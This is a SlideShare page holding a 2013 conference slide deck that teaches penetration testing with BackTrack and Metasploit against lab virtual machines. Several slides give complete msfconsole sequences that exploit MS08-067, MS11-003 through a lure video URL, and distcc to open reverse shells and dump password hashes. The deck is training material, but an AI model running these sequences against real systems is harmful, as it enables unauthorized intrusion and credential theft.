iCrOSS 2013_Pentest
Report
M.Syarifudin, ST, OSCP, OSWP Follow
Jul. 14, 2013•0 likes•14,681 views
3 likes
Be the first to like this
Show More
views
Total views
0
On Slideshare
0
From embeds
0
Number of embeds
0
Check these out next
iCrOSS 2013_Pentest
Jul. 14, 2013•0 likes•14,681 views
3 likes
Be the first to like this
Show More
views
Total views
0
On Slideshare
0
From embeds
0
Number of embeds
0
Download to read offline
Report
Technology
[Slide] iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP Follow
Recommended
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
Metasploit for Web WorkshopDennis Maldonado
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
Automated Penetration Testing With The Metasploit FrameworkTom Eston
Introduction To Exploitation & MetasploitRaghav Bisht
Pen-Testing with MetasploitMohammed Danish Amber
iCrOSS 2013_Pentest
- PENETRATIONTESTINGAND METASPLOITBASIC Presented by Syarif ! Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini
- Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track basic overview • Information Gathering & Port Scan ( Demo) • Metasploit Basics & Meterpreter • Challenge ;)
- Whoami • Just me my self : http://fl3x.us ; @fl3xu5 • InfoSec Enthusiast & Trainer • Lecture & Assistant Manager • CyberCrime Investigator
- Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
- What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
- Ethics • Think before act • Don’t be stupid • Don’t be malicious
- Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
- << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
- << back|track overview • Watch theVideo ! :)
- << back|track overview
- << back|track overview
- What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
- Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
- MSFconsole
- MSFcli
- Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
- How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
- Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
- Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
- Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
- Meterpreter command
- Meterpreter command
- Meterpreter command
- Meterpreter command
- Meterpreter command
- Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
- Pentest Skenario • Set network adapter : NAT • Firewall & Windows update : OFF • Fresh OS installed ! • startx
- OS in the Lab • BackTrack 5 R 3 • IP address : 172.16.150.169 • Windows Xp SP 2 • IP address : 172.16.150.165 • Windows 2003 Server • IP address : 172.16.150.167 • Windows 7 • IP address : 172.16.150.170 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.150.171
- Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
- Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
- Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
- Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
- Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
- Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.150.171 • set lhost 172.16.150.169 • exploit
- Any Question ? Contact me • Website : http://fl3x.us • Twitter : @fl3xu5
- Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
- References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines
- Challenge in 45 minutes :) • ConnectYour Windows OS to TP LINK Access Point over dhcp • BackTrack 5R3VMWare setting : • Network adapter : Bridge • Get 4 Pictures by your self & shutdown the targets ( if you can :p ) • Win the Polo T-Shirt indobacktrack
- Challenge in 45 minutes :)